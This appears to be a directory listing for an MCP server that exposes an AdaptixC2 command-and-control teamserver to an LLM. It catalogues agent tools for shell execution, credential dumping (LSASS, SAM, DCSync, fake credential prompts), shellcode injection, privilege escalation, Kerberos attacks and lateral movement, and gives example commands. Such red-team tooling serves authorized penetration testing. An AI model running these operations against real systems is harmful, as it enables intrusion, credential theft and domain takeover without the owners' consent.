AdaptixC2 MCP Server
Server Configuration
Describes the environment variables required to run the server.
| Name | Required | Description | Default |
|---|---|---|---|
| ADAPTIXC2_HOST | Yes | IP address of the AdaptixC2 teamserver | |
| ADAPTIXC2_PORT | Yes | Port of the AdaptixC2 teamserver | |
| ADAPTIXC2_ENDPOINT | Yes | API endpoint path (e.g., /api) | |
| ADAPTIXC2_PASSWORD | Yes | Password for authenticating to the AdaptixC2 teamserver | |
| ADAPTIXC2_USERNAME | Yes | Username for authenticating to the AdaptixC2 teamserver | |
Capabilities
Features and capabilities supported by this server
| Capability | Details |
|---|---|
| tools | { "listChanged": false } |
| prompts | { "listChanged": false } |
| resources | { "subscribe": false, "listChanged": false } |
| experimental | {} |
Tools
Functions exposed to the LLM to take actions
| Name | Description |
|---|---|
| list_agentsA | List all active agents connected to the AdaptixC2 teamserver. Returns: OS, hostname, username, IP, process, sleep interval, elevation status. |
| agent_infoA | Get detailed information about a specific agent by ID. Accepts both internal a_id and GUI-visible a_crc (8-char hex). |
| kill_agentA | Remove an agent session from the teamserver. This removes the C2 record — it does NOT kill the implant process. |
| tag_agentB | Set a text tag on one or more agents for organisation. agent_ids: comma-separated list of agent IDs. |
| list_listenersA | List all active listeners on the teamserver. |
| list_task_historyA | Show execution history for a specific agent. Returns recent commands, their timestamps, statuses and outputs. Use this to avoid repeating commands if results are recent and valid. |
| get_uidA | Get the current user identity on the agent. Runs native 'getuid' beacon command. Returns: username and privilege level of the current token. |
| list_processesA | List all running processes on the agent host. Runs 'ps list' beacon command. Returns: process list with PID, name, user, and session info. |
| kill_processC | Kill a running process by PID. Args: pid (INT, required) — process ID to terminate. |
| run_processB | Run a program on the agent host via 'ps run'. Args: args: Full path + arguments, e.g. 'C:\Windows\System32\cmd.exe /c whoami' suspend: Start process suspended (-s) with_output: Capture output (-o) impersonate: Use token impersonation (-i) |
| list_credentialsB | List all credentials harvested across all agents. |
| list_targetsA | List all known targets/hosts in the teamserver database. |
| execute_shellB | Execute a command via cmd.exe (Windows) or /bin/sh (Linux). Args: command (required) — e.g. 'whoami /all' or 'ipconfig /all' |
| execute_powershellB | Execute a PowerShell expression (Windows only). Args: command (required) — e.g. 'Get-LocalUser | Select Name,Enabled' |
| execute_rawA | Execute a raw command string on an agent (AxScript engine). The cmdline is parsed exactly as if typed in the agent console. Use for advanced commands not covered by other tools. |
| set_agent_sleepB | Change the agent's sleep interval and jitter. Args: sleep_seconds (INT), jitter_percent (INT, default 0) |
| jobs_listC | List long-running background jobs on an agent. |
| jobs_killB | Kill a background job on an agent by task ID. Args: task_id (STRING) — from jobs_list output. |
| list_directoryB | List contents of a directory or details of a file on the agent. Usage: ls [path] Arguments: path : STRING (optional, default '.') — Directory or file path to list. Example: ls C:\Users |
| get_working_directoryA | Print the current working directory of the agent process. Usage: pwd Returns the absolute path of the agent's current directory. |
| read_fileB | Read first 2048 bytes of a file on the agent. Usage: cat Arguments: path : STRING (required) — Absolute path to the file to read. Example: cat C:\Windows\System32\drivers\etc\hosts |
| change_directoryB | Change the current working directory of the agent process. Usage: cd Arguments: path : STRING (required) — Target directory path. Example: cd C:\Windows\System32 |
| copy_fileC | Copy a file on the agent. Usage: cp Arguments: src : STRING (required) — Source file path. dst : STRING (required) — Destination file path. Example: cp C:\Temp\file.txt C:\Temp\backup.txt |
| move_fileB | Move (rename) a file on the agent. Usage: mv Arguments: src : STRING (required) — Source file path. dst : STRING (required) — Destination file path. Example: mv C:\Temp\old.txt C:\Temp\new.txt |
| make_directoryC | Create a directory on the agent. Usage: mkdir Arguments: path : STRING (required) — Directory path to create. Example: mkdir C:\Temp\newdir |
| remove_fileB | Remove a file or folder on the agent. Usage: rm Arguments: path : STRING (required) — Path to file or directory to remove. Example: rm C:\Temp\file.txt |
| download_fileA | Task the agent to download a file to the teamserver. Usage: download Arguments: remote_path : STRING (required) — Full path to the file on the agent to download. Example: download C:\Temp\secrets.txt Use list_downloads to see completed downloads and get_downloaded_file to retrieve content. |
| list_disksA | List mounted drives on the agent system. Usage: disks Returns: list of mounted drives (e.g. C:\, D:\). |
| list_downloadsA | List all files that have been downloaded from agents to the teamserver. |
| get_downloaded_fileA | Retrieve the content of a file previously downloaded from an agent. Returns the file content as base64-encoded text. Use list_downloads to get file IDs. |
| list_tunnelsA | List all active tunnels (SOCKS proxies, port forwards) on the teamserver. |
| start_socks5C | Start a SOCKS5 proxy tunnel through an agent. Binds a SOCKS5 listener on the teamserver host. Returns the tunnel ID on success. |
| start_socks4B | Start a SOCKS4 proxy tunnel through an agent. Binds a SOCKS4 listener on the teamserver host. Returns the tunnel ID on success. |
| port_forwardA | Start a local port forward through an agent: lhost:lport (local on teamserver) → thost:tport (target via agent). Returns the tunnel ID. |
| reverse_port_forwardC | Start a reverse port forward through an agent: agent listens on port, forwards to thost:tport from the teamserver. Returns the tunnel ID. |
| stop_tunnelA | Stop an active tunnel by its ID. Use list_tunnels to find tunnel IDs. |
| log_findingB | Log a finding (credential, secret, or important file) to the local session notes. Arguments: agent_id : STRING — ID of the agent where the finding was made. category : STRING — Type of finding (e.g., 'Credential', 'Configuration', 'Loot'). content : STRING — The actual data found (password, hash, file content). context : STRING — Description of where and how it was found. |
| save_writeupB | Save a short writeup or explanation of an action (e.g., how you elevated privileges). Use this to record successful techniques for later review. |
| view_session_notesA | Read all saved notes and findings for this session. |
| bof_adC | AD-BOF: Active Directory exploitation commands. adwssearch [-a attributes] [--dc dc] [--dn dn] Executes ADWS query. Example: adwssearch (objectClass=*) -a *,ntsecuritydescriptor --dc DC1 badtakeover BOF for account takeover via BadSuccessor (dMSA). Example: badtakeover "OU=TestOU,DC=domain,DC=dom" attacker S-1-5-21-...-1104 "CN=admin,CN=Users,DC=domain,DC=dom" domain.dom dcsync single [-ou ou_path] [-dc dc_address] [--ldaps] [--only-nt] DCSync a single user. Example: dcsync single jane.doe -dc dc01.corp.local dcsync all [-ou ou_path] [-dc dc_address] [--ldaps] [--only-nt] [--only-users] DCSync all domain users. Example: dcsync all -dc dc01.corp.local --only-users ldapsearch [-a attributes] [-c count] [-s scope] [--dc dc] [--dn dn] [--ldaps] Raw LDAP query. Example: ldapsearch (objectClass=*) -a *,ntsecuritydescriptor --dc DC1 ldapq computers Get list of computers from LDAP (auto-populates Targets tab). Example: ldapq computers readlaps [-dc dc] [-dn dn] {-target name | -target-dn dn} Read LAPS password. Example: readlaps -dc dc01.domain.local -target WINCLIENT webdav enable Enable WebDAV client service (no elevated privileges needed). webdav status Check if WebDAV is running on remote hosts. Example: webdav status 192.168.0.1,192.168.0.2 |
| bof_adcsA | ADCS-BOF: Active Directory Certificate Services attacks. certi auth --cert [--password pass] [--dc dc] [--target user] Authenticate with certificate (PKINIT + UnPAC-the-hash). Example: certi auth --cert MIIMcAI... certi enum [--ca ca] [--template tmpl] [--dc dc] Enumerate CAs and certificate templates. Example: certi enum certi request --ca --template [--subject CN=...] [--altname CN=...] [--alturl ...] Request an enrollment certificate. Example: certi request --ca cert.example.org\example-CA --template vulnTemplate certi request_on_behalf Request cert on behalf of another user (ESC3). Example: certi request_on_behalf ca\CA-Name vulnTemplate Administrator /tmp/ea.pfx certi shadow --target [--dc dc] [--device-id id] Shadow Credentials attack — write KeyCredentialLink and get certificate. Example: certi shadow --target Administrator |
| bof_credsB | Creds-BOF: Windows credential extraction. askcreds [-p prompt] [-n note] [-t wait_time_secs] [--async] Prompt user for credentials via fake dialog. Example: askcreds -p "Windows Update" get-netntlm [--no-ess] Retrieve NetNTLM hash (Internal Monologue). Example: get-netntlm --no-ess hashdump Dump SAM hashes (requires admin). Auto-saves to credentials tab. lsadump_secrets Dump LSA secrets from SECURITY hive (requires SYSTEM). Auto-saves service credentials. lsadump_sam Dump SAM hashes via lsadump::sam (requires admin). lsadump_cache Dump cached domain credentials DCC2/MSCacheV2 (requires SYSTEM). nanodump [--write path] [--valid] [--ppl-dump] [--kdump] ... Dump LSASS via syscalls. Example: nanodump --write C:\Windows\Temp\lsass.dmp nanodump_ppl_dump Bypass PPL and dump LSASS (PPL-dump variant). nanodump_ppl_medic Bypass PPL and dump LSASS (PPL-medic variant). nanodump_ssp Load a Security Support Provider (SSP) into LSASS. cookie-monster [--edge] [--chrome] [--firefox] [-t target_user] Locate and copy browser cookie files. underlaycopy <MFT|Metadata> [-w destination] [--download] Copy file using low-level NTFS (MFT/Metadata mode). Example: underlaycopy MFT C:\Windows\System32\notepad.exe -w C:\temp\copy.exe |
| bof_elevationA | Elevation-BOF: Local privilege escalation to SYSTEM. getsystem token Elevate to SYSTEM via TrustedInstaller impersonation. Example: getsystem token uacbybass sspi UAC bypass via SSPI Datagram Contexts. Example: uacbybass sspi c:\windows\tasks\agent.exe uacbybass regshellcmd UAC bypass via ms-settings Shell registry key. Example: uacbybass regshellcmd c:\windows\tasks\agent.exe potato-dcom {--token | --run } DCOM Potato — SYSTEM via SeImpersonate. Example: potato-dcom --token Example: potato-dcom --run C:\Windows\System32\cmd.exe /c whoami /all potato-print {--token | --run } PrintSpoofer — SYSTEM via Print Spooler Named Pipe. Example: potato-print --token |
| bof_executionC | Execution-BOF: In-process payload execution. execute-assembly [params] [--async] Execute a .NET assembly in-process (no fork-and-run). Example: execute-assembly /opt/Seatbelt.exe -group=user noconsolation [args] Run an unmanaged EXE/DLL inside agent memory without a console. Example: noconsolation /tmp/mimikatz.exe "sekurlsa::logonpasswords" |
| bof_injectionA | Injection-BOF: Shellcode injection into target processes. inject-cfg Inject via CFG hook (combase.dll __guard_check_icall_fptr). Example: inject-cfg 808 /tmp/shellcode.bin inject-sec Inject via section mapping. Example: inject-sec 808 /tmp/shellcode.bin inject-poolparty Inject via Pool Party techniques (1-8). 1=StartRoutine, 2=TP_WORK, 7=TP_DIRECT, etc. Example: inject-poolparty 7 808 /tmp/shellcode.bin inject-32to64 Inject x64 shellcode from WOW64 (32-bit) agent into native x64 process via RtlCreateUserThread. Requires 32-bit agent. Example: inject-32to64 808 /tmp/shellcode.bin |
| bof_kerbeusA | Kerbeus-BOF: Kerberos ticket operations and attacks. kerbeus asreproasting /user: [/domain:] [/dc:] [/outfile:] AS-REP roasting. Example: kerbeus asreproasting /user:pre_user kerbeus asktgt /user: /password: [/enctype:aes256] [/ptt] [/opsec] Request a TGT. Example: kerbeus asktgt /user:Admin /password:QWErty /enctype:aes256 /ptt kerbeus asktgs /user: /service: [/ticket:<.kirbi>] [/enctype:aes256] [/ptt] Request a TGS. Example: kerbeus asktgs /user:Admin /service:cifs/dc01.corp.local kerbeus changepw /ticket: /new: [/dc:] Reset a user password from a valid TGT. kerbeus dump [/luid:] [/service:] [/client:] Dump Kerberos tickets from memory. kerbeus hash /password: [/user:] [/domain:] [/enctype:rc4|aes128|aes256] Calculate Kerberos hashes. kerbeus kerberoasting [/spn:] [/dc:] [/outfile:] Kerberoasting. Example: kerbeus kerberoasting kerbeus klist [/luid:] List Kerberos tickets in memory. kerbeus ptt /ticket: Submit (Pass-the-Ticket) a TGT. Example: kerbeus ptt /ticket:doIFg... kerbeus describe /ticket: Parse and describe a ticket. kerbeus purge [/luid:] Purge Kerberos tickets from memory. kerbeus renew /ticket: [/dc:] [/ptt] Renew a TGT. kerbeus s4u /user: /rc4: /impersonateuser: /msdsspn: [/ptt] S4U2Self/S4U2Proxy constrained delegation abuse. kerbeus cross_s4u /user: /ticket: /impersonateuser: /msdsspn: [/ptt] Cross-domain S4U constrained delegation abuse. kerbeus tgtdeleg /spn: Retrieve usable TGT without elevation via GSS-API. Example: kerbeus tgtdeleg /spn:host/dc01.corp.local kerbeus triage [/luid:] List tickets in table format. |
| bof_ldapB | LDAP-BOF: Full LDAP read/write/delete operations against Active Directory. ENUMERATION (Read): ldap get-acl — Get ACL/security descriptor ldap get-attribute — Get specific attribute(s) ldap get-computers — List all domain computers ldap get-groups — List all domain groups ldap get-groupmembers — List members of a group ldap get-delegation — Get delegation config ldap get-domaininfo — Get domain info from rootDSE ldap get-maq — Get Machine Account Quota ldap get-object — Get all attributes of an object ldap get-rbcd — Get RBCD config ldap get-spn — Get SPNs ldap get-uac — Get UAC flags ldap get-users — List all domain users ldap get-usergroups — List groups a user is member of ldap get-writable — Find objects you have write access to MODIFICATION (Write): ldap move-object — Move object to different OU ldap add-ace — Add ACE to DACL ldap add-attribute — Add value to attribute ldap add-computer [password] — Add computer to domain ldap add-delegation — Add delegation SPN ldap add-group [ou] — Add group ldap add-groupmember — Add member to group ldap add-ou — Add OU ldap add-rbcd — Add RBCD delegation ldap add-sidhistory — Add SID to sidHistory ldap add-spn — Add SPN ldap add-user [password] [ou] — Add user ldap add-uac — Add UAC flags ldap add-genericall — Add GenericAll ACE ldap add-genericwrite — Add GenericWrite ACE ldap add-dcsync — Add DCSync rights ldap add-asreproastable — Set DONT_REQ_PREAUTH ldap add-unconstrained — Enable unconstrained delegation ldap add-constrained — Set constrained delegation SPNs ldap set-attribute — Set/replace attribute ldap set-delegation — Set delegation SPNs ldap set-owner — Set object owner ldap set-spn — Set SPNs (replaces all) ldap set-password — Set/reset user password ldap set-uac — Set UAC flags (replaces all) REMOVAL (Delete): ldap remove-ace — Remove ACE from DACL ldap remove-attribute [val] — Remove attribute/value ldap remove-delegation — Remove delegation SPN ldap remove-dcsync — Remove DCSync rights ldap remove-genericall — Remove GenericAll ACE ldap remove-genericwrite — Remove GenericWrite ACE ldap remove-groupmember — Remove group member ldap remove-object — Delete object from domain ldap remove-rbcd — Remove RBCD delegation ldap remove-spn — Remove SPN ldap remove-uac — Remove UAC flags |
| bof_lateralB | LateralMovement: Spawn sessions and execute commands on remote targets. jump psexec [-b binary_name] [-s share] [-p svc_path] [-n svc_name] [-d svc_desc] Spawn session via PsExec (copy+create service). Example: jump psexec 192.168.0.1 /tmp/agent.exe -n UpdateService jump scshell [-b binary_name] [-s share] [-p svc_path] [-n svc_name] Spawn session via SCShell (modify existing service). Example: jump scshell 192.168.0.1 /tmp/agent.exe -n defragsvc invoke winrm [-t timeout_ms] [-b] [-u username] [-p password] Execute command via WinRM. Example: invoke winrm 192.168.0.1 "whoami /all" -u DOMAIN\admin -p P@ss invoke scshell Execute command via SCShell (fileless). Example: invoke scshell 10.0.2.10 defragsvc "cmd.exe /c \share\agent.exe" token make Create impersonated token (logon types: 2=Interactive, 3=Network, 8=NetworkCleartext, 9=NewCredentials). Example: token make admin P@ssword domain.local 9 token steal Steal access token from a process. Example: token steal 608 runas-user [-l logon_type] [-t timeout_ms] [-o] [-b] Run command as another user (RunasCs-like). Example: runas-user admin P@ss domain.local "cmd /c whoami" -l 9 runas-session Execute binary in another user's session via COM (IHxHelpPaneServer). Requires admin. Example: runas-session 3 C:\Windows\Temp\file.exe |
| bof_mssqlA | MSSQL-BOF: Microsoft SQL Server enumeration and exploitation. Common optional flags for most commands: [-d database] [-l linkedserver] [-i impersonate_user] [-u user] [-p password] mssql 1434udp — Get SQL Server info via UDP 1434 mssql adsi [-l linked] [-i impersonate] [server] [adsiserver] — Get ADSI creds from linked server mssql agentcmd — Execute system command via SQL Agent Jobs mssql agentstatus — Enumerate SQL Agent status and jobs mssql checkrpc — Check RPC status of linked servers mssql clr [-h hash] — Load and execute .NET assembly via CLR stored procedure mssql columns — Enumerate columns in a table mssql databases — Enumerate SQL databases mssql disableclr / enableclr — Disable/Enable CLR integration mssql disableole / enableole — Disable/Enable OLE Automation mssql disablerpc / enablerpc — Disable/Enable RPC on linked server mssql disablexp / enablexp — Disable/Enable xp_cmdshell mssql impersonate — Enumerate users that can be impersonated mssql info — Gather SQL Server information mssql links — Enumerate linked servers mssql olecmd — Execute command via OLE Automation mssql query — Execute custom SQL query. Example: mssql query 192.168.1.10 "SELECT @@version" mssql rows — Get row count in table mssql search — Search tables for a column name mssql smb \listener — Coerce NetNTLM auth via xp_dirtree mssql tables — Enumerate tables in database mssql users — Enumerate users with database access mssql whoami — Get logged in user, mapped user, and roles mssql xpcmd — Execute command via xp_cmdshell |
| bof_postexC | PostEx-BOF: Post-exploitation utilities. firewallrule add [-g groupname] [-d description] Add inbound/outbound firewall rule via COM (no admin needed). Example: firewallrule add 80 RuleName in -g Group1 -d TestRule screenshot_bof [-n name] [-p pid] Alternative screenshot — does NOT use fork-and-run. Example: screenshot_bof -n screen1 -p 812 sauroneye -d -f -k Search directories for files with specific keywords (SauronEye BOF port). Example: sauroneye -d C:\Users -f .txt,.docx -k pass*,secret* |
| bof_processC | Process-BOF: Process enumeration and manipulation. findobj module List all processes that have a specific module loaded. Example: findobj module clr.dll findobj prochandle List all processes that have a handle to the specified process. Example: findobj prochandle lsass.exe process conn List processes with established TCP/RDP connections with detailed info. Example: process conn procfreeze freeze Freeze a target process using PPL bypass via WerFaultSecure.exe. Example: procfreeze freeze 1234 procfreeze unfreeze Unfreeze a previously frozen process. Example: procfreeze unfreeze |
| bof_relayinformerA | RelayInformer-BOF: Check relay attack mitigations on remote services. relay-informer http Check HTTP(S) binding enforcement and channel binding. Example: relay-informer http https://test.dom.local relay-informer ldap Check LDAP signing and LDAPS channel binding enforcement. Example: relay-informer ldap DC relay-informer mssql Check MSSQL binding and channel binding enforcement. Example: relay-informer mssql DB relay-informer smb Check SMB2 signing enforcement. Example: relay-informer smb DC01 |
| bof_salA | SAL-BOF: Situational Awareness Local — Windows host reconnaissance. arp — List ARP table cacls — List file/directory permissions. Example: cacls C:\test.txt dir [directory] [/s] — List directory contents (recursive with /s). Example: dir C:\Users /s env — List process environment variables ipconfig — List IPv4 addresses, hostname, DNS servers listdns — List DNS cache entries and resolve them netstat — Display active network connections nslookup [-s server] [-t type] — DNS query. Example: nslookup google.com -s 8.8.8.8 -t A routeprint — List IPv4 routes uptime — Show system boot time and uptime useridletime — Show user idle time in seconds/minutes/hours/days whoami — Run whoami /all (groups, privileges, SID) privcheck all — Run ALL privilege escalation checks privcheck alwayselevated — Check AlwaysInstallElevated registry setting privcheck autologon — Check Winlogon autologon credentials privcheck credmanager — Enumerate Windows Credential Manager privcheck hijackablepath — Check PATH for writable directories privcheck modautorun — Check for modifiable autorun executables privcheck modsvc — Check for services with modifiable DACL privcheck pshistory — Check PowerShell PSReadLine history file privcheck tokenpriv — List token privileges and highlight vulnerable ones privcheck uacstatus — Check UAC status and integrity level privcheck unattendfiles — Check for leftover unattend.xml files privcheck unquotedsvc — Check for unquoted service paths privcheck vulndrivers — Check for known vulnerable drivers (loldrivers.io) |
| bof_sarA | SAR-BOF: Situational Awareness Remote — Network discovery and enumeration. smartscan [-p ports] Smart TCP port scan. Target can be IP, range, CIDR, or comma-separated. Port presets: fast, standart, full, or custom (e.g. 80,443,22-25,3389). Example: smartscan 192.168.1.0/24 -p standart taskhound [-u username] [-p password] [-save dir] [-unsaved-creds] [-grab-blobs] Collect scheduled tasks from a remote system. Example: taskhound 192.168.1.100 -u domain\admin -p password quser [host] Query user sessions on a remote machine. Example: quser MainDC nbtscan [-v] [-q] [-e] [-l] [-s separator] [-t timeout_ms] [-no-targets] NetBIOS name scanner. Auto-populates Targets tab. Example: nbtscan 192.168.1.0/24 -v |
Prompts
Interactive templates invoked by user choice
| Name | Description |
|---|---|
| No prompts | |
Resources
Contextual data attached and managed by the client
| Name | Description |
|---|---|
| No resources | |
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/Faceless0x7/AdaptixC2-MCP-Server'
If you have feedback or need assistance with the MCP directory API, please join our Discord server.